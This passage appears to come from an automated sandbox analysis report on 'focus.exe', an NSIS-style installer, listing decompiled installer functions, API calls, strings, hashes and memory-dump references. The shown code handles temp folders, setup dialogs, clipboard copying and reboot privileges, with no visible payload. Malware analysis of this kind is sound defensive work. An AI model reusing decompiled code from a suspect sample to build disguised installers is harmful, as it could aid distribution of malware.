					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403358
0x0040335c
0x00403364
0x00403368
0x0040336d
0x00403379
0x00403382
0x00403387
0x0040338a
0x00403391
0x00403398
0x00403398
0x00403391
0x0040339a
0x0040339f
0x004033a0
0x004033ac
0x004033b0
0x004033b6
0x004033c4
0x004033c9
0x004033d0
0x004033d4
0x004033d8
0x004033da
0x004033da
0x004033d8
0x004033e2
0x004033e9
0x004033ef
0x00403405
0x00403415
0x0040341a
0x00403420
0x00403427
0x00403433
0x0040343d
0x0040343f
0x00403441
0x00403446
0x00403446
0x00403456
0x0040345c
0x00403525
0x00403525
0x00403527
0x00403529
0x00000000
0x00000000
0x00403465
0x00403468
0x00403470
0x00403470
0x00403473
0x00403478
0x0040347a
0x0040347a
0x0040347b
0x0040347b
0x00403480
0x00403483
0x00403515
0x0040351a
0x0040351f
0x00403522
0x00403524
0x00403524
0x00403524
0x00000000
0x00403489
0x00403489
0x0040348a
0x0040348d
0x004034a5
0x004034d0
0x004034d2
0x004034e5
0x00403510
0x00403513
0x00403531
0x00403534
0x0040353d
0x00403542
0x00403548
0x00403553
0x00403555
0x0040355a
0x0040355c
0x004035b4
0x004035b9
0x004035c3
0x004035ca
0x004035ce
0x00403662
0x00403662
0x00403667
0x0040366d
0x00403672
0x00403796
0x0040379c
0x00403818
0x00403818
0x0040381d
0x00403820
0x00403822
0x00403822
0x0040382a
0x0040382a
0x004037ac
0x004037b4
0x004037b6
0x004037b7
0x004037c4
0x004037d7
0x004037df
0x004037e3
0x004037e3
0x004037eb
0x004037f0
0x004037f7
0x00403805
0x00403807
0x0040380d
0x0040380f
0x00000000
0x00000000
0x00000000
0x004037f9
0x004037ff
0x00403801
0x00403803
0x00403811
0x00403813
0x00000000
0x00403813
0x00000000
0x00403803
0x004037f7
0x00403681
0x00403688
0x00403688
0x004035da
0x00403652
0x00403652
0x0040365e
0x00000000
0x0040365e
0x004035e3
0x004035e7
0x0040361d
0x0040361d
0x0040361f
0x00403627
0x00403699
0x0040369b
0x004036a2
0x004036aa
0x004036aa
0x004036b5
0x004036ba
0x004036c9
0x004036cd
0x004036ce
0x004036d7
0x004036d0
0x004036d0
0x004036d0
0x004036dd
0x004036e3
0x004036e9
0x004036f1
0x004036f1
0x004036ff
0x00403704
0x00403716
0x0040371e
0x00403724
0x00403730
0x00403736
0x00403740
0x00403756
0x00403767
0x0040376d
0x00403774
0x00403777
0x0040377d
0x0040377d
0x00403774
0x00403781
0x00403787
0x00403787
0x0040378c
0x0040378c
0x00000000
0x004036c9
0x00403629
0x0040362b
0x00403636
0x00000000
0x00000000
0x0040363e
0x00403649
0x0040364e
0x00000000
0x0040364e
0x00403612
0x00403614
0x00403618
0x0040361b
0x00000000
0x00000000
0x00000000
0x0040361b
0x00000000
0x00403614
0x00403564
0x00403570
0x00403575
0x0040357a
0x0040357c
0x00000000
0x00000000
0x00403584
0x0040358c
0x0040359d
0x004035a5
0x004035a7
0x004035ac
0x004035ae
0x00000000
0x00000000
0x00000000
0x004035ae
0x00000000
0x00403513
0x004034d4
0x004034d7
0x004034da
0x004034e0
0x004034e0
0x004034e0
0x004034e0
0x00000000
0x004034e0
0x004034dc
0x004034de
0x00000000
0x00000000
0x00000000
0x004034de
0x0040348f
0x00403492
0x00403495
0x0040349b
0x0040349b
0x00000000
0x0040349b
0x00403497
0x00403499
0x00000000
0x00000000
0x00000000
0x00403499
0x00000000
0x00000000
0x00000000
0x0040346a
0x0040346a
0x0040346a
0x0040346b
0x0040346b
0x00000000
0x0040346a
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 0040336D
GetVersion.KERNEL32 ref: 00403373
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
OleInitialize.OLE32(00000000), ref: 004033E9
SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
GetCommandLineA.KERNEL32(Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\focus.exe" ,00000020,"C:\Users\user\Desktop\focus.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 0040390A: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,74B5FA90), ref: 004039FA
Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000), ref: 00403A0D
Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(: Completed), ref: 00403A18
Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E

ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662

Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
ExitProcess.KERNEL32 ref: 00403688
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
ExitProcess.KERNEL32 ref: 0040382A

Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E

Strings

C:\Users\user\Desktop\focus.exe, xrefs: 00403745
1033, xrefs: 004035B4
C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00403644
SeShutdownPrivilege, xrefs: 004037BE
C:\Users\user\AppData\Local\Temp\, xrefs: 00403548, 0040354D, 00403563, 0040356F, 0040357E, 0040358B, 00403597, 0040359F, 00403698, 004036A9, 004036B4, 004036C0, 004036CD, 004036DC, 0040378B
Name Setup, xrefs: 00403410
Error launching installer, xrefs: 0040361F
UXTHEME, xrefs: 0040339A, 0040339F, 004033A5
NSIS Error, xrefs: 0040340B
.tmp, xrefs: 004036AF
", xrefs: 0040347B
TEMP, xrefs: 00403598
C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00403538, 00403639, 004036E3, 004036EC
~nsu, xrefs: 00403693
TMP, xrefs: 004035A0
\Temp, xrefs: 0040356A
C:\Users\user\Desktop, xrefs: 004036BA, 004036BF, 004036EB
"C:\Users\user\Desktop\focus.exe" , xrefs: 00403420, 00403426, 004035DD
Low, xrefs: 00403586

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\focus.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\RadioBOSSAssembly$C:\Users\user\AppData\Roaming\RadioBOSSAssembly$C:\Users\user\Desktop$C:\Users\user\Desktop\focus.exe$Error launching installer$Low$NSIS Error$Name Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 562314493-311863776
Opcode ID: 1696fd18bf7af8dd94241a8e5af2d50579e181fcbe0ccea8defda79c6d91920a
Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
Opcode Fuzzy Hash: 1696fd18bf7af8dd94241a8e5af2d50579e181fcbe0ccea8defda79c6d91920a
Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040535C, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x90174
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						FindCloseChangeNotification(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8); // executed
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								_t113 =  *0x42a068; // 0x71981c
								E0040521E( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405362
0x0040536a
0x0040536d
0x00405375
0x00405378
0x00405507
0x0040550d
0x0040552a
0x00405531
0x00405531
0x0040553d
0x00405543
0x00405565
0x00405565
0x0040556b
0x004055c0
0x004055c0
0x004055c3
0x00000000
0x00000000
0x004055c5
0x004055c8
0x004055cb
0x00000000
0x00000000
0x004055d5
0x004055db
0x004055dd
0x004055e0
0x004056dd
0x00000000
0x004056dd
0x004055ef
0x004055fb
0x00405604
0x0040560b
0x0040560f
0x00405612
0x0040561b
0x00405621
0x00405624
0x00405624
0x00405634
0x0040563a
0x0040563d
0x00405648
0x00405648
0x00405649
0x0040564c
0x00405653
0x0040565a
0x00405662
0x00405662
0x00405670
0x00405676
0x00405679
0x00405679
0x00405680
0x00405686
0x0040568f
0x00405696
0x0040569f
0x004056a1
0x004056a4
0x004056b3
0x004056b5
0x004056b8
0x004056b9
0x004056bc
0x004056bd
0x004056be
0x004056be
0x004056c6
0x004056d1
0x004056d7
0x004056d7
0x00000000
0x0040563d
0x0040556d
0x00405573
0x004055a1
0x004055a3
0x004055a9
0x004055ab
0x004055b4
0x004055b4
0x004055bb
0x00000000
0x004055bb
0x00405577
0x00405581
0x00000000
0x00405545
0x00405545
0x0040554b
0x00405586
0x00000000
0x0040558d
0x00405554
0x0040555b
0x00405560
0x00000000
0x00405560
0x00405543
0x0040537e
0x00405382
0x0040538a
0x0040538e
0x00405391
0x00405394
0x00405397
0x0040539a
0x0040539b
0x0040539c
0x004053b5
0x004053b8
0x004053c2
0x004053d1
0x004053d9
0x004053e1
0x004053e6
0x004053e9
0x004053f5
0x004053fe
0x00405407
0x00405429
0x0040542f
0x00405440
0x00405445
0x00405453
0x00405461
0x00405461
0x00405466
0x00405474
0x00405474
0x00405479
0x0040547c
0x00405481
0x0040548d
0x00405496
0x004054a3
0x004054b2
0x004054a5
0x004054aa
0x004054aa
0x004054be
0x004054be
0x004054d2
0x004054db
0x004054e4
0x004054f4
0x00405500
0x00405500
0x00000000

APIs

GetDlgItem.USER32 ref: 004053BB
GetDlgItem.USER32 ref: 004053CA
GetClientRect.USER32 ref: 00405407
GetSystemMetrics.USER32 ref: 0040540E
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
ShowWindow.USER32(?,00000008), ref: 004054AA
GetDlgItem.USER32 ref: 004054CB
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
GetDlgItem.USER32 ref: 004053D9

Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

GetDlgItem.USER32 ref: 0040551C
CreateThread.KERNELBASE ref: 0040552A
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405531
ShowWindow.USER32(00000000), ref: 00405554
ShowWindow.USER32(?,00000008), ref: 0040555B
ShowWindow.USER32(00000008), ref: 004055A1
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
CreatePopupMenu.USER32 ref: 004055E6
AppendMenuA.USER32 ref: 004055FB
GetWindowRect.USER32 ref: 0040561B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
OpenClipboard.USER32(00000000), ref: 00405680
EmptyClipboard.USER32 ref: 00405686
GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
GlobalLock.KERNEL32 ref: 00405699
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
GlobalUnlock.KERNEL32(00000000), ref: 004056C6
SetClipboardData.USER32 ref: 004056D1
CloseClipboard.USER32 ref: 004056D7

Strings

Name Setup: Completed, xrefs: 0040564C

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: Name Setup: Completed
API String ID: 4154960007-1721692471
Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 00403CA7, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0x2
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878; // 0x1
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0x2
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0x2
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890); // executed
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8); // executed
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8); // executed
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8); // executed
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60); // executed
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0x2
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x50242
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa); // executed
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403cb0
0x00403cb9
0x00403dfa
0x00403dfe
0x00403e02
0x00403e04
0x00403e09
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e28
0x00403e2b
0x00403e30
0x00403e3e
0x00403e4b
0x00403e52
0x00403e52
0x00403e53
0x00403e53
0x00403e58
0x00403e5e
0x00403e65
0x00403e6b
0x00403e6d
0x00403ead
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00403ec5
0x00403ec7
